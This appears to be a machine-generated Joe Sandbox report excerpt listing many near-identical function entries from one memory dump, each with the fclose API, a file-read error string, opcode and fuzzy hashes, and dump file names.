                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction ID: 48b59ad65841c59f8b884ad3730cd0292ec52fa8aee3208cf21cee5466b6fd3f
                                                                                                                                                  • Opcode Fuzzy Hash: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 73F05423F3824741F962BB0578417B991526F89B76F8945358D5C4A6C1ED3E598382A0
                                                                                                                                                  Function 00007FF775724992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction ID: 1530a1fb54a4a4607d96658e83b298e5d89d7ec585c19e5fa60623e2f43929cf
                                                                                                                                                  • Opcode Fuzzy Hash: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction Fuzzy Hash: D0F05423F3824741F962BB0578427B991526F89B75F8945358D5C4B6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction ID: 51be8a490e1e08e4a3f5164ce5822924aa47bcad63ebcc087115975e6d315b41
                                                                                                                                                  • Opcode Fuzzy Hash: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction Fuzzy Hash: 18F05423F3824741F962BB05B8417B991526F89B71F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction ID: 48b59ad65841c59f8b884ad3730cd0292ec52fa8aee3208cf21cee5466b6fd3f
                                                                                                                                                  • Opcode Fuzzy Hash: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 73F05423F3824741F962BB0578417B991526F89B76F8945358D5C4A6C1ED3E598382A0
                                                                                                                                                  Function 00007FF77572487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction ID: 1530a1fb54a4a4607d96658e83b298e5d89d7ec585c19e5fa60623e2f43929cf
                                                                                                                                                  • Opcode Fuzzy Hash: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction Fuzzy Hash: D0F05423F3824741F962BB0578427B991526F89B75F8945358D5C4B6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction ID: ec2d63413657b2fa603b4fa87cb7647dab3b29bbcfd721279e475faa39bbbfc2
                                                                                                                                                  • Opcode Fuzzy Hash: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction Fuzzy Hash: DDF05423F3824741F962BB05B8417B991526F89B75F8945358D5C4A6C1DE3E698382A0
                                                                                                                                                  Function 00007FF775724890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction ID: 67d1be7399e677caee23625330b4174cea5461be801341f27f55d0cf337e1f42
                                                                                                                                                  • Opcode Fuzzy Hash: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction Fuzzy Hash: D6F05423F3824741F962BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF7757247A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction ID: 51be8a490e1e08e4a3f5164ce5822924aa47bcad63ebcc087115975e6d315b41
                                                                                                                                                  • Opcode Fuzzy Hash: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction Fuzzy Hash: 18F05423F3824741F962BB05B8417B991526F89B71F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF7757247B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction ID: 48b59ad65841c59f8b884ad3730cd0292ec52fa8aee3208cf21cee5466b6fd3f
                                                                                                                                                  • Opcode Fuzzy Hash: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 73F05423F3824741F962BB0578417B991526F89B76F8945358D5C4A6C1ED3E598382A0
                                                                                                                                                  Function 00007FF7757247BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction ID: 1530a1fb54a4a4607d96658e83b298e5d89d7ec585c19e5fa60623e2f43929cf
                                                                                                                                                  • Opcode Fuzzy Hash: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction Fuzzy Hash: D0F05423F3824741F962BB0578427B991526F89B75F8945358D5C4B6C1DD3E598382A0
                                                                                                                                                  Function 00007FF7757247C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction ID: ec2d63413657b2fa603b4fa87cb7647dab3b29bbcfd721279e475faa39bbbfc2
                                                                                                                                                  • Opcode Fuzzy Hash: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction Fuzzy Hash: DDF05423F3824741F962BB05B8417B991526F89B75F8945358D5C4A6C1DE3E698382A0
                                                                                                                                                  Function 00007FF7757247D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction ID: 67d1be7399e677caee23625330b4174cea5461be801341f27f55d0cf337e1f42
                                                                                                                                                  • Opcode Fuzzy Hash: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction Fuzzy Hash: D6F05423F3824741F962BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction ID: 5bd4e7f81f42379beb41e091632d4f427e95885871ca6e7c3f230e29be095e54
                                                                                                                                                  • Opcode Fuzzy Hash: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction Fuzzy Hash: ABF05423F3824741F963BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF77572475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction ID: 51be8a490e1e08e4a3f5164ce5822924aa47bcad63ebcc087115975e6d315b41
                                                                                                                                                  • Opcode Fuzzy Hash: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction Fuzzy Hash: 18F05423F3824741F962BB05B8417B991526F89B71F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction ID: 48b59ad65841c59f8b884ad3730cd0292ec52fa8aee3208cf21cee5466b6fd3f
                                                                                                                                                  • Opcode Fuzzy Hash: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 73F05423F3824741F962BB0578417B991526F89B76F8945358D5C4A6C1ED3E598382A0
                                                                                                                                                  Function 00007FF775724771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
